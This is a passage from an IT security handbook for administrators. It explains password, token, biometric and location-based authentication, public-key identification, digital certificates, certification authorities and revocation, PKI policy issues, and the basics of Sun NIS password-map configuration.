perform. Instead, a plethora of relative identification systems have been fielded. Computer security professionals usually describe these systems as relying on "something that you know," "something that you have," or "something that you are." The following sections describe these three traditional approaches, as well as a newer one: "someplace where you are." Password-based systems: something that you know The earliest digital identification systems were based on passwords. Every user of the system is assigned a username and a password; to "prove" your identity to the computer, you simply type your password. If the password that you type matches the password that is stored on the computer, then the assumption is that you must be who you claim to be. Because they are simple to use and require no special hardware, passwords continue to be the most popular authentication system used in the world today. As a result of this popularity, most of us now have dozens of passwords that we need to remember on an almost daily basis, including PINs (personal identification numbers) or passwords for accessing ATM cards, long-distance calling cards, voice-mail systems, and answering machines, unlocking cell phones, unlocking desktop computers, accessing dialup Internet service providers, downloading electronic mail, and accessing web sites. There are several problems with passwords, some insurmountable: · Passwords must be distributed to users. Some systems use default passwords or allow the first user to set a password, but defaults are often left unchanged and the first user may not be the authorized user. · Passwords can be intercepted when sent to a remote computer. Encryption can lessen this risk, but there is no way to encrypt the PIN a person types at an ATM so that it can't be deciphered by someone looking over his or her shoulder. · Good passwords are easy to forget, which leads people to write them down, use the same password for many uses, set up simpler second-stage password reminders, or choose bad passwords that are easy to guess. · Passwords can be shared, which may allow unauthorized people to use resources they shouldn't. Physical tokens: something that you have Another way that people can authenticate their identities is through the use of tokens-- physical objects whose possession somehow proves identity. Door keys have been used for centuries as physical access tokens; in many modern buildings, metal keys are supplemented with either magnetic or radio-frequency-based access card systems. Access card systems are superior to metal-key-based systems because every card can have a unique number that is tied to an identity. The system, in turn, has a list of the cards authorized to open various doors. Time-based restrictions can be added as well, so that a low-level clerk's card can't be used to gain access to an office after-hours. PART Token-based systems tend to be self-policing: users quickly report cards that are lost or stolen because they need their cards to gain access; when a card is reported missing, that card can be deactivated and a new card issued to FIVE the holder. This is an improvement over a keypad-based system, where individuals can share their PIN codes without losing their own access. 240 IT SECURITY FOR TECHNICAL ADMINISTRATORS As with passwords, tokens have problems as well: · The token doesn't really "prove" who you are. Anybody who has physical possession of the token can gain access to the restricted area. · If a person loses a token, that person cannot enter the restricted area, even though that person's identity hasn't changed. · Some tokens are easily copied or forged. Token-based systems don't really authorize or identify individuals: they authorize the tokens. This is especially a problem when a token is stolen. For this reason, in high-security applications token systems are frequently combined with some other means of identification: this is often referred to as two-factor authentication. For instance, to gain access to a room or a computer, you might need to both present a token and type an authorization code. This is the technique used by automatic teller machines (ATMs) to identify bank account holders. Biometrics: something that you are A third technique becoming more commonly used by computers to determine a person's identity is to make a physical measurement of the person and compare the measurement with a profile that has been previously recorded. This technique is called a biometric, because it is based on measuring something about a living person. Many kinds of biometrics are possible, including images of a person's face, retina, or iris, fingerprints, footprints, or hand geometry, voice prints, handwriting, or typing characteristics, and DNA patterns. Biometric techniques can be used for both ongoing identification and absolute identification. Using these techniques for ongoing identification is the simplest approach: the first time the user accesses the system, his biometric information is recorded. On subsequent accesses, the new biometric is compared with the stored record. To use biometrics for absolute identification, it is necessary to construct a large data-base matching names with biometrics. In the United States, the Federal Bureau of Investigation has such a database matching fingerprints to names, and another that matches DNA material. Compared with passwords and access tokens, biometrics have two clear advantages. They can't be lost or forgotten, and they can't be readily shared, copied, or stolen. But biometric technology has been difficult to bring from the laboratory to the market. All biometric systems exhibit a certain level of false positives, in which the system erroneously declares a match when it shouldn't, and false negatives, in which the system erroneously declares that two biometrics are from different people, when in fact they are from the same person. To reduce the possibility of false matches, some biometric systems combine the biometric with a password or token. In the case of passwords, a user is typically asked to type a secret identification code, such as a PIN, and then give a biometric sample, such as a voice print. The system uses that PIN to retrieve a specific stored profile, which is then compared with the sample from the profile. In this manner, the system only needs to compare the provided biometric with a single stored measurement, rather than with the entire database. Biometrics are not perfect: · A person's biometric "print" must be on file in the computer's database before that person can be identified. · If the database of biometric records is compromised, then the biometric identification is worthless. · Unless the measuring equipment is specially protected, the equipment is vulnerable to sabotage and fraud. For example, a clever thief could defeat a voice-recognition system by recording a person speaking his passphrase and then playing it back. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 241 Location: someplace where you are With the development of computer systems that can readily determine the location of their users, it is now possible to deploy position-based authentication systems. Although the Global Positioning System (GPS) can be readily used for obtaining location information, there are two serious hindrances for GPS in this application: the fact that GPS doesn't usually work indoors, and the fact that there is no way to securely get the positional information from the GPS receiver to the remote service that needs to do the verification. A better choice for position-based authentication is the positional services offered by some mobile telephone networks. With these systems, the network can determine the user's location and then directly report this information to the service, without risking that the information may be compromised while the user is authenticated. A simple form of location-based authentication is to have a particular terminal or computer that is authorized to perform a special function. People who are in other locations are prohibited from exercising privilege. To date, location has not been used as a general system for authentication. Using Public Keys for Identification The identification and authentication techniques mentioned earlier all share a common flaw: to reliably identify an individual, that person must be in the presence of the person or computer that is performing the identification. If the person is not present--if the identification is being performed by telephone, by fax, or over the Internet--then there is high potential for fraud or abuse because of replay attacks. Imagine a situation in which one computer acquires a user's fingerprint and another performs the verification. In this case, it is possible for an attacker to intercept the code for the digitized fingerprint as it moves over the network. Once the attacker has the fingerprint transmission, the attacker can use it to impersonate the victim. Replay attacks are a fundamental attack against the digital identification systems mentioned so far. Properly implemented, public key cryptography can eliminate the risk of replay attacks. When public key systems are used for identification, the private key is used to create a signature and the public key is used to verify that signature. As the private key never leaves the possession of the person being identified--it never gets sent over the wire--there is no opportunity for an attacker to intercept the private key and use it for malicious purposes. Public key cryptography can be used for either offline authentication or online authentication. In the case of offline authentication, a user creates a digitally-signed message that can be verified at a point in the future. In the case of online authentication, a user authenticates in real time with a remote server. The remote server sends the user's computer randomly-generated challenge data, and the user's computer digitally signs the challenge with the user's private key and returns it. Or, in another variation, the remote server encrypts a challenge with the user's public key and sends the encrypted challenge to the user, who proves her identity by decrypting the challenge and returning it encrypted with the server's public key. Because of the challenge-response protocol, online systems are generally more secure than offline systems. Managing Private Keys PART When a digital signature is used to "prove someone's identity," identity proving is not precisely what is taking FIVE place. Being able to create a valid digital signature doesn't prove you are a particular person: it proves you have possession of a particular private key. That's why it's possible to find keys on public key servers purporting to be for Hillary Clinton and Batman. 242 IT SECURITY FOR TECHNICAL ADMINISTRATORS For digital signature validation to become identity authentication, several preconditions need to be met: 1. Each private key/public key pair must be used by only one person. 2. The private key must be kept secure, lest it be compromised, captured, and used fraudulently by others. 3. There needs to be some sort of trust mechanism in place, so that the person verifying the identity can trust or believe that the name on the key is in fact the correct name. If keys are carelessly generated, then it may be possible for an attacker to take a public key and determine the corresponding private key. If keys are not stored properly, then the attacker may simply be able to steal the private key. While these rules look simple on the surface, in practice they can be exceedingly difficult to implement properly. Even worse, frequently it is difficult to evaluate a company's public key system and decide if it is more secure or less secure than a competing system. There are a number of different alternatives for creating and storing keys. Roughly in order of decreasing security, they are: 1. Employ a crypto-graphic coprocessor such as a smart card. A typical public key-compatible smart card has a small microprocessor with a hardware random number generator for creating keys and performing the basic public key algorithms; it also has a region of memory that can hold the keys and public key "certificates". In theory, the private key never actually leaves the card. Instead, if you want to sign or decrypt a piece of information, that piece of information has to be transmitted into the card, and the signed or decrypted answer transmitted off the card. Thus, attackers cannot use the private key unless they have possession of the smart card. Smart cards can be augmented with PINs, passphrases, fingerprint readers, or other biometric devices, so that the card will not create a signature unless the holder is authenticated to the card. Smart cards aren't without their drawbacks, however. Some types are quite fragile. If the card is lost, stolen, or damaged, the keys it contains are gone and no longer available to the user. Thus, if the keys on the card are to be used for long-term encryption of information, it may be desirable to have some form of card duplication system or key escrow to prevent key loss. Such measures are not needed, however, if the keys are only used for digital signatures. If a signing key is lost, it is only necessary to create a new signing key: no information is lost. Smart cards are not completely tamper-proof. Cryptographic smart cards implement tiny operating systems: flaws in these operating systems can result in the compromise of key material. It is also possible to physically analyze a card and force it to divulge its key. Nevertheless, smart cards are currently the most secure way to store private keys. 2. Generate them on a desktop computer and then store the encrypted keys on a floppy disk or flash disk. When the key is needed, the user inserts the floppy disk into the computer's drive; the computer reads the encrypted private key into memory, decrypts the key, and finally uses the key to sign the requested information. This technique is less secure than the smart card because it requires that the private key be transferred into the computer's memory, where it could be attacked and compromised by a computer virus, Trojan horse, or other rogue program. 3. Generate the key inside the computer, then encrypt the key using a passphrase and store the key in a file on the computer's hard disk. This is the technique that programs such as PGP and Netscape Navigator use to protect private keys. This technique is convenient. The disadvantage is that if somebody gains access to your computer and knows your pass-phrase, he or she can access your private key. And because the key must be decrypted by the computer to be used, it is vulnerable to attack inside the computer's memory by a rogue program or a Trojan horse. 4. The least secure way to generate a public key/private key pair is to let somebody else do it for you, and then to download the private and public keys. The fundamental problem with this approach is that the private key is by definition compromised: somebody else has a copy of it. Nevertheless, some organizations (and some governments) require that people use third-party key generation for this very reason: so that the organization will have a copy of each user's key, allowing the organization to decrypt all email sent to the individual. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 243 In practice, most cryptographic systems use the third option--generating a key on a desktop computer and then storing the key on the computer's hard disk. Digital Certificates The use of digital certificates and a public key infrastructure (PKI) are attempts to tie absolute identity to digital signatures. A digital certificate is a special kind of digital signature--it is a digital signature that comes with an identity, which is designed to be interpreted by computers in an automated way. A public key infrastructure is a collection of technologies and policies for creating and using digital certificates. The effectiveness of these systems comes from a marriage of public key cryptography, carefully written and maintained policies, and the legal system. The problem of digital identification with public keys has profoundly deep philosophical implications. How can you ever know if a public key really belongs to the individual or an organization whose name is on the key? How can we ever really know anything? As it turns out, we can know quite a bit about the identity of key holders and the authenticity of digital certificates, as long as certain rules and procedures are followed in the creation and protection of these instruments. There are three basic approaches to insuring that a public key really belongs to the individual it claims to: 1. Get the public key directly from the individual and confirm the key's integrity in a manner that cannot be falsified. 2. Determine that another individual that you trust vouches for the key. 3. Determine that a reliable central authority has certified the key. Confirming a Key's Integrity Personally One way to be sure that you've got Jane Trocard's public key is to meet with Jane and have her read out her copy of the key and compare it, number-for-number, with yours. If you know Jane well enough, and if you trust the telephone system, you might do this comparison over the telephone instead ­ but not over the Internet, where someone could intercept the comparison and replace the numbers with those of a bogus key. Because public keys are based on very long numbers, number-by-number comparison is inconvenient. Instead, you and Jane might independently compute a shorter cryptographic message digest and compare the characters in that digest. Such digests are often call "key fingerprints". Some avid public key cryptography users print their key fingerprints on their business cards; if you've received a business card directly from Jane, you can later download her public key and verify its integrity. Certifying Other People's Keys Once you know that Jane's key is valid ­ that it's really her key ­ you might be willing to accept other public keys if Jane will vouch for them. Jane can vouch for other people's keys by signing them with her own key. When you receive a key signed by Jane's key, you know that Jane herself has signed it, because you know that Jane's key is valid and you assume only Jane has access to it. PART The decision to accept keys that Jane vouches for is not based on the validity of Jane's key, but on the level of FIVE trust you have for Jane herself to be careful about whose keys she vouches for. In most public key systems, these two concepts ­ the validity of a key and the trust you assign its owner ­ are independent. In some systems, you can require that two or more trusted parties each vouch for a key before you are willing to accept it as valid. 244 IT SECURITY FOR TECHNICAL ADMINISTRATORS PGP users often hold "signing parties" at which they meet, in person, to verify one another's keys and then sign them. At the end of such a party, a participant's public key may have a dozen or more signatures that someone else can later use to decide if the key is valid. PGP users distribute their keys worldwide on PGP key servers; when you download a key from a key server, you can use the signatures to decide whether you believe that this key really identifies the user it claims to. Certification Authorities: Third-Party Registrars While key signing parties are a great way to meet people, experience has shown that they are not a practical way to create a national database of cross-certified public keys--the coverage is simply too uneven. Some people don't have the time to go to key signing parties. Moreover, having somebody's signature on your key reveals that you know each other, or at least that you met each other. That's why most large-scale uses of public key cryptography rely on a tree of certifications, with a certification authority at the root. A certification authority (CA) is any individual or organization that issues digital certificates. A CA can impose standards before it signs a key; for example, a university might verify that the key that it was about to sign really belonged to a bona fide student. Another CA might not have any standards at all. The world's largest CA, VeriSign, issues several different kinds of certificates. VeriSign signs certificates under its VeriSign Trust Network (VTN) for public use; the company also issues certificates for use within corporations. The lowest level of certificates issued by VTN have no assurance; the highest levels come with the promise that VTN attempted to establish the identity of the key holder before the certificate was issued. Conceptually, a certificate signed by a CA looks like a cryptographically signed index card. The certificate contains the identity information of the user, signed by the certification authority's own private key, and also lists the name of the CA, that CA's public key, and a serial number. To date, most certificates are a promise by the CA that a particular public key belongs to a particular individual or organization. But certificates can also be used for assertions, as in the university example. There are many different ways that a certification authority can offer service: Internal CA An organization can operate a CA to certify its own employees. Certificates issued by an internal CA might certify an individual's name, position, and level of authority. These certificates could be used within the organization to control access to internal resources or the flow of information. Such an internal CA would be the basis of the organization's public key infrastructure. Companies can also operate internal CAs that issue certificates to customers. For example, some brokerages have required that their customers obtain certificates before they are allowed to execute high value trades over the Internet. Outsourced CA An organization might want to partake in the benefits of using digital certificates, but not have the technical ability to run its own certification authority. Such an organization could contract with an outside firm to provide certification services for its own employees or customers, exactly as a company might contract with a photo lab to create identification cards. Trusted third-party CA A company or a government can operate a CA that binds public keys with the legal names of individuals and businesses. Such a CA can be used to allow individuals with no prior relationship to establish each other's identity Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 245 and engage in legal transactions. Certificates issued by such a CA would be analogous to drivers' licenses and identity cards issued by a state. Before you can use the certificates issued by a CA, you need to have a copy of the CA's public key. Public keys are distributed on certificates of their own. Currently, most of these certificates are prebundled in web browsers and operating systems. CA public keys can also be added manually by the end user. Clearly, CAs that do not have their keys prebundled are at a disadvantage. Although Microsoft and Netscape have now opened up their browsers to any CA that can meet certain auditing requirements, the original web browsers were distributed with a small number of carefully selected CA keys. The bundling of these keys was a tremendous advantage to these CAs and a barrier to others. Certification Practices Statement (CPS) The certification practices statement (CPS) is a legal document CAs publish that describes their policies and procedures for issuing and revoking digital certificates. It answers the question, "What does it mean when this organization signs a key?" CPS documents are designed to be read by humans, not by machines. A business might be willing to accept certification from a CA that guarantees minimum certification policies and a willingness to assume a certain amount of liability in the event that its certification policies are not followed--and provided that the CA is bonded by an appropriate bonding agency. The X.509 v3 Certificate Although certification authorities can issue any kind of certificate, in practice the vast majority of CAs issue certificates that follow the X.509 v3 standard. Likewise, most cryptographic programs and protocols, including SSL, are only designed to use X.509 v3 certificates. The only notable exception to this is PGP, which uses its own certificate format, although recent versions support reading some X.509 certificates. (The Secure Shell (ssh) program does not use certificates, but instead relies on users confirming public keys personally.) Each X.509 certificate contains a version number, a serial number, identity information, algorithm-related information, and the signature of the issuing authority. The industry adopted X.509 v3 certificates, rather than the original X.509 certificates, because the X.509 v3 standard allows arbitrary name/value pairs to be included in the standard certificate. These pairs can be used for many purposes and allow the uses of certificates to be expanded without changing the underlying protocol. Types of Certificates There are four primary types of digital certificates in use on the Internet today: Certification authority certificates PART These certificates contain the public keys of CAs and either the name of the CA or the name of the particular service being certified. These certificates are typically self-signed--that is, signed with the CA's own private key. CAs can FIVE also cross-certify, or sign each other's master keys. What such cross-certification actually means is an open question. Microsoft Windows, Microsoft Internet Explorer, Netscape Navigator, and OpenSSL are all shipped with more than a dozen different CA certificates. 246 IT SECURITY FOR TECHNICAL ADMINISTRATORS Several companies have more than one CA certificate in the CA lists that are distributed with web browsers. VeriSign has the most: over 20 different certificates. Signatures by different private keys denote different levels of trust and authentication. Server certificates These certificates contain the public key of an SSL server, the name of the organization that runs the server, and the DNS name of the server. Every cryptographically-enabled information server on the Internet must be equipped with a server certificate for the SSL encryption protocol to function properly. Although the originally stated purpose of these certificates was to allow consumers to determine the identity of web servers and to prevent man-in-the- middle attacks, in practice server certificates are more widely used for encryption than for server authentication. Personal certificates These certificates contain an individual's name and the individual's public key. They can have other information as well, such as the individual's e-mail address, postal address, or birth date. They are issued by organizations to their customers or employees. Personal certificates are a substantially more secure way of having people identify themselves on the Internet than usernames and passwords. They are also required for users of the S/MIME e-mail encryption protocol. Software publisher certificates These certificates are used to verify the signatures on software that is distributed, such as ActiveX components and downloadable executables. Every copy of recent Windows operating systems is distributed with a number of software publisher certificates that can be used to validate the signatures on Windows applications. Minimal disclosure certificates Digital certificates represent a threat to the privacy of their users. When you present a certificate to a server, the server can easily record all of the information about your identity that's present on the certificate, whether or not it's necessary to authenticate you to that server. In many jurisdictions, an organization that obtained this information in the course of business would be free to do whatever it wished with the data. A way to minimize the privacy threat is by using minimal disclosure certificates. These certificates allow the holder to selectively reveal specific facts that are on a certificate without revealing others. A woman who wanted to gain access to a web site for a cancer survivors group might use minimal disclosure certificates to prove to the web site that she was a woman over 21 who had breast cancer without revealing her name or address. Minimal disclosure certificates were invented by the mathematician Stefan Brands and exclusively licensed in February 2000 to the Canadian corporation Zero Knowledge Systems.212 Revocation Besides issuing certificates, CAs need a way of revoking them if the private key is compromised or the CA makes a mistake. Certificates may also need to be revoked when an employee is terminated. The need for effective revocation mechanisms was made particularly clear in March 2001, when Microsoft announced that VeriSign had issued two certificates in January "to an individual who fraudulently claimed to be a Microsoft employee. The common name assigned to both certificates is Microsoft Corporation." Microsoft went on to note that "the ability to sign executable content using keys that purport to belong to Microsoft would clearly be advantageous to an attacker who wished to convince users to allow the content to run."213 212http://www.wired.com/news/technology/0,1282,34496,00.html 213http://www.microsoft.com/technet/security/bulletin/MS01-017.asp Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 247 Certificate revocation lists One approach to revocation is the certificate revocation list (CRL). A CRL is a list of every certificate that has been revoked by the CA that has not yet expired for other reasons. Ideally, a CA issues a CRL at regular intervals. Besides listing certificates that have been revoked, the CRL states how long it will be valid and where to get the next CRL. Current practice is that X.509 v3 certificates should contain a field called the CRL distribution point (CDP). In theory, a program that wishes to verify if a certificate has been revoked should be able to download a CRL from the CDP to determine if the certificate has been revoked. As most certificates will be issued by a small number of CAs, it is reasonable to assume that a program might download a new CRL every day or every hour, and then cache this list for successive lookups. An organization with limited Internet connectivity could download the CRL once and distribute it to its users. In practice, CRLs and CDPs have had a variety of problems: · If a CA is very popular, it is likely that the CRLs will grow very large. VeriSign's 900K CRL for its SSL server certificates can take more than 20 minutes to download over a dialup connection. · There is a period between the time that a certificate is revoked and the time that the new CRL is distributed when a certificate appears to be valid but is not. · The information contained in CRLs can be used for traffic analysis. · Many programs do not properly implement CRLs and CDPs. In the case of the fraudulently-issued Microsoft certificate, the bogus certificate was revoked and listed in VeriSign's CRL. Unfortunately, the certificates that VeriSign issued did not contain valid CDPs. (According to VeriSign, CDPs are not present in Authenticode certificates because of a bug in the implementation of Authenticode distributed with Internet Explorer 3.02.) Without the CDP, a program that attempted to verify the authenticity of the fraudulently- issued certificates would not know where to find the CRL on which the certificates were listed.214 Real-time certificate validation An alternative to CRLs is to use real-time validation of certificates. These systems consult an online database operated by the certification authority every time the authenticity of a certificate needs to be validated. Real-time certification validation systems neatly dispense with the CRL problem, although they do require a network that is reliable and available. The primary problem with real-time validation is one of scale. As there are more and more users of certificates, the validation servers need to be faster and faster to serve the larger user community. Furthermore real-time systems are vulnerable to denial of service (DoS) attacks. If it is not possible for a business to connect to the revocation server, what should be done with a certificate--trust it or discard it? If the default is to trust it, fraud can be committed by flooding the revocation server so as to make it unresponsive while a revoked certificate is used. If the default is to reject requests when the revocation server is unreachable, then it is possible to cause all transactions to be rejected using a DoS attack, thus damaging the reputation of the business through a cascading denial of service. PART FIVE 214In the end, Microsoft had to issue an operating system patch to resolve the problem. The patch contained an additional revocation handler that causes Internet Explorer to consult a local CRL to evaluate the authenticity of certificates, and a local CRL listing the two mistakenly issued VeriSign certificates. 248 IT SECURITY FOR TECHNICAL ADMINISTRATORS Public Key Infrastructure Public key infrastructure (PKI) is the system of digital certificates, certification authorities, tools, systems, and hardware that are used to deploy public key technology. Many of the early proponents of PKI envisioned a single PKI, operated by or for governments, which would provide state-certified certificates. The public PKI was a grand vision, but so far it hasn't happened. Companies such as VeriSign have issued millions of certificates to verify the identity of individuals and organizations, and the keys to sign these certificates have been widely distributed. Some of these so-called trust hierarchies, such as the trust hierarchy used to certify web server certificates, are used by more than a hundred million people. But they are run by private businesses, and not by governments. The word "public" in PKI refers to public keys, rather than to the public at large. Shortcomings of Today's CAs It's unfortunate, but if you look closely into the root certificates that are bundled with Internet Explorer and Netscape Navigator, you'll see that there are significant inconsistencies and quality control problems with today's CAs. Lack of permanence for Certificate Policies field Internet Explorer's Certificate panel allows you to automatically open the web page that is associated with the certification practices statement for each of the certificates that is registered. This field is indicated as a URL in a field called "Certificate Policies" in the X.509 v3 certificate. It is very important for a CA to maintain a web page at every URL that is listed in every certificate that it has ever issued. If these URLs move, links should be left in their place. If a CA changes its CPS, then it must archive each CPS at a unique URL. These links must remain accessible for the lifetime of any signed certificate that references the CPS. This is because the legal meaning of the certificate cannot be determined without reading the certificate practices statement. Furthermore, because it is possible that the meaning of a signature might be questioned many years after the signature is created, the URLs should probably remain active for a period of at least 20 years. Unfortunately, many CA certificates point to CPSs that are no longer accessible. The self-signed certificate distributed with Internet Explorer 5.0 for the Autoridad Certificadora del Colegio Nacional de Correduria Publica Mexicana, A.C. is valid from June 29, 1999 until June 29, 2009. The certificate claims that the certificate practices statement for this key is located at http://www.correduriapublica.org.mx/RCD/dpc. Nevertheless, by April 2001 the URL for that CPS was not accessible. Inconsistencies in certificate fields The CA certificates that are bundled into Netscape Navigator and Internet Explorer are supposed to be the basis for the world's e-commerce infrastructure and legally binding agreements. Complicating this goal is the fact that there is a huge variation in the ways that the certificate fields are being used by different organizations. In particular, the "Subject" field, which identifies the issuer by its Distinguished Name, has no standard format, and different CA certificates include wildly different qualifiers in their Subject. Consistency in the use of the Distinguished Name and other fields is vital if certificates are to be processed in a programmatic way with software. Without this consistency, certificates need to be visually inspected by individuals who are trained to understand all of the different styles and formats that legitimate names can have, so that valid certificates can be distinguished from rogue ones. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 249 Unrealistic expiration dates Early versions of the Netscape Navigator web browser were distributed with CA certificates that had expiration dates between December 25, 1999 and December 31, 1999. These products were in use far longer than anybody anticipated. When the end of 1999 rolled around, many of the products with these old CA certificates inside them simply stopped working. Although it should have been possible to simply download new certificates, users were advised to upgrade their entire applications because of other security problems with these early products. Many users were not happy that the software they had been depending on suddenly stopped working. As a result of this experience, many CAs have decided to err in the other direction. They have started distributing CA certificates with unrealistically long expiration times. All of the certificates distributed with Internet Explorer 5.0 are 1024-bit RSA certificates, yet more than half of these certificates have expiration dates after January 1, 2019! VeriSign distributes eight certificates with Internet Explorer 5.5 that have expiration dates in the year 2028! Many cryptographers believe that 1024-bit RSA will not be a secure encryption system at that point in the future. PKI Policy Issues The need for a widespread PKI is compelling. There are growing incidents of fraud on the Internet, and there is an increasing need to use digital signatures to do business. Yet widespread PKI seems further away today than it was in the mid 1990's. It's an article of faith among computer security specialists that private keys and digital certificates can be used to establish identity. But these same specialists will pick up the phone and call one another when the digital signature signed at the bottom of an e-mail message doesn't verify. That's because it is very, very easy for the technology to screw up. Here are a few of the problems that must be faced in building a true PKI. Private Keys Are Not People Digital signatures facilitate proofs of identity, but they are not proofs of identity by themselves. Unless the private key is randomly generated and stored in such a way that it can only be used by one individual, the entire process may be suspect. Unfortunately, both key generation and storage depend on the security of the end user's computer. But the majority of the computers used to run Netscape Navigator or Internet Explorer are unsecure. Many of these computers run software that is downloaded from the Internet without knowledge of its source. Some of these computers are infected by viruses. Some of the programs downloaded have Trojan horses pre-installed. And the most common operating system and browser are terribly buggy, with hundreds of security patches issued over the past few years, so it is possible that any arbitrary system in use on the network has been compromised in the recent past by parties unknown. The widespread use of smart cards and smart card readers may make it much more difficult to steal somebody's private key. But it won't be impossible to do so. PART Distinguished Names Are Not People Protecting private keys is not enough to establish the trustworthiness of the public key infrastructure. How do you FIVE determine if the name in the Distinguished Name field is really correct? Each CA promises that it will follow its own certification rules when it signs its digital signature. How do you know that a CA's rules will assure that a distinguished name on the certificate really belongs to the person they think it does? 250 IT SECURITY FOR TECHNICAL ADMINISTRATORS How do you evaluate the trustworthiness of a CA? Should private companies be CAs, or should that task be reserved for nations? Would a CA ever break its rules and issue fraudulent digital identification documents? After all, governments, including the United States, have been known to issue fraudulent passports when their interests have demanded that they do so. How do you compare one CA with another CA? Some CAs obtain third-party audits including SAS 70215 (service auditor report) or Web Trust for CAs216 (attestation report); others do not. The American Bar Association Information Security Committee has published a book, PKI Assessment Guidelines, but few users have the skill or the access to be able to assess the CAs that they might employ. In theory, many of these questions can be resolved through the creation of standards, audits, and formal systems of accreditation. Legislation can also be used to create standards. But in practice, efforts to date are not encouraging. There Are Too Many Robert Smiths What do you do with a certificate that says "Robert Smith" on it? How do you tell which Robert Smith it belongs to? Clearly, a certificate must contain more information than simply a person's name: it must contain enough information to uniquely and legally identify an individual. Unfortunately, you (somebody trying to use Robert Smith's certificate) might not know this additional information--so there are still too many Robert Smiths for you. Of course, if these digital certificates did have fields for a person's age, gender, or photograph, users on the Internet would say that these IDs violated their privacy if they disclosed that information without the user's consent. And they would be right. That's the whole point of an identification card: to remove privacy and anonymity, producing identity and accountability as a result. Digital Certificates Allow for Easy Data Aggregation Over the past two decades, universal identifiers such as the U.S. Social Security number have become tools for systematically violating people's privacy. Universal identifiers can be used to aggregate information from many different sources to create comprehensive data profiles of individuals. Digital certificates issued from a central location have the potential to become a far better tool for aggregating information than the Social Security number ever was. That's because digital signatures overcome the biggest problem with Social Security numbers: poor data. People sometimes lie about their Social Security numbers; other times, these numbers are mistyped. Today, when two businesses attempt to match individually identified records, the process is often difficult because the numbers don't match. By design, digital certificates will simplify this process by providing for verified electronic entry of the numbers. As a result, the practice of building large data banks of personal information aggregated from multiple sources is likely to increase. How Do You Loan a Key? Suppose Carl is sick in the hospital and he wants you to go into his office and bring back his mail. To do this, he needs to give you his private key. Should he be able to do that? Should he revoke his key after you bring it back? Suppose he's having a problem with a piece of software. It crashes when he uses private key A, but not when he uses private key B. Should he be legally allowed to give a copy of private key A to the software developer so she can figure out what's wrong with the program? Or is he jeopardizing the integrity of the entire public key infrastructure by doing this? 215Statement on Auditing Standards (SAS) No. 70, Service Organizations, is an internationally recognized auditing standard developed by the American Institute of Certified Public Accountants (AICPA). A SAS 70 examination signifies that a service organization has had its control objectives and control activities examined by an independent accounting and auditing firm. 216Under the WebTrust Program for CAs, an independent and qualified auditor uses an established, recognized, and accepted set of principles and criteria to assess whether an active certification authority meets a minimum standard for disclosures, policies, practices, and monitoring procedures. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 251 Suppose a private key isn't associated with a person, but is instead associated with a role that person plays within a company. For example, consider a private key that's used for signing purchase orders. Is it okay for two people to have that private key? Or should the company create two private keys, one for each person who needs to sign purchase orders? Network-based Authentication Several solutions to the problem of user authentication have been proposed for environments in which there are multiple workstations available to users, connected to one another through an untrusted and potentially unsecure network. For convenience, we'd like to have user account data stored on a central server, but for redundancy we might like to have that central server's data replicated on other servers in real time. For security, we need to ensure that when a user logs into a workstation, his identity is authenticated against the central server's data store without exposing private data on the untrusted network. Although solutions to this problem have been offered -- including NIS, NIS+, Kerberos, and LDAP ­ none has been universally adopted. NIS and NIS+ are primarily used in environments with many Unix workstations; Kerberos and LDAP are increasingly seen in these environments as well, and are also part of Microsoft Windows NT-based operating systems. Sun's Network Information Service (NIS) One of the oldest and best-known distributed administrative database systems is Sun's Network Information Service (NIS). It was superseded years ago by NIS+, an enhanced but more complex successor to NIS, also by Sun. More recently, LDAP (Lightweight Directory Access Protocol) servers are becoming more popular, and Sun users are migrating to LDAP-based services. However, even though NIS has been deprecated by Sun, it is still widely used in many environments. NIS is a distributed database system that lets many computers share password files, group files, host tables, and other files over the network. Although the files appear to be available on every computer, they are actually stored on only a single computer, called the NIS master server (and possibly replicated on a backup, or slave server). The other computers on the network, NIS clients, can use the databases (such the password file) stored on the master server as if they were stored locally. These databases are called NIS maps. With NIS, a large network can be managed more easily because all of the account and configuration information can be stored and maintained on a single machine, yet used on all the systems in the network. Some files are replaced by their NIS maps. Other files are augmented. For these files, NIS uses the plus sign (+) to tell the system that it should stop reading the file (e.g., /etc/passwd) and should start querying the appropriate map (e.g., passwd) from the NIS server. The server maintains multiple maps, normally corresponding to files stored in the /etc directory, such as /etc/passwd, /etc/hosts, and /etc/services. For example, the /etc/passwd file on a client might look like this: root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh +::999:999::: PART This causes the program reading /etc/passwd on the client to make a network request to read the passwd map on FIVE the server. Normally, the passwd map is built from the server's /etc/passwd file, although this need not necessarily be the case. When NIS is scanning the /etc/passwd file, it will stop when it finds the first line that matches. You can restrict the importing of accounts to particular users by following the "+" symbol with a particular username. You can also exclude certain usernames from being imported by inserting a line that begins with a minus sign (-). 252 IT SECURITY FOR TECHNICAL ADMINISTRATORS NIS also allows you to selectively import some fields from the /etc/passwd database but not others. For example, if you have the following entry in your /etc/passwd file: root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh +:*:999:999::: Then all of the entries in the NIS passwd map will be imported, but each will have its password entry changed to *, effectively preventing it from being used on the client machine. You get all the UIDs and account names, so that file listings show the owner of files and directories as usernames. The entry also allows the ~user notation in the various shells to correctly map to the user's home directory (assuming that it is mounted using NFS). NIS Domains When you configure an NIS server, you must specify an NIS domain. These domains are not the same as DNS domains. While DNS domains specify a region of the Internet, NIS domains specify an administrative group of machines. The Unix domainname command is used to display and to change your domainname. A computer can only be in one NIS domain at a time, but it can serve any number of NIS domains. Don't use your Internet domain as your netgroup domain. Setting the two domains to the same name has caused problems with some versions of sendmail. It is also a security problem to use an NIS domain that can be easily guessed. Hacker toolkits that attempt to exploit NIS or NFS bugs almost always try variations of the Internet domain name as the NIS domainname before trying anything else. (Of course, the domainname can still be determined in other ways.) NIS Netgroups NIS netgroups allow you to create groups for users or machines on your network. Netgroups are similar in principle to local groups for users, but they are much more complicated. The primary purpose of netgroups is to simplify your configuration files, and to give you less opportunity to make a mistake. By properly specifying and using netgroups, you can increase the security of your system by limiting the individuals and the machines that have access to critical resources. The netgroup database is kept on the NIS master server in the file /etc/netgroup or /usr/ 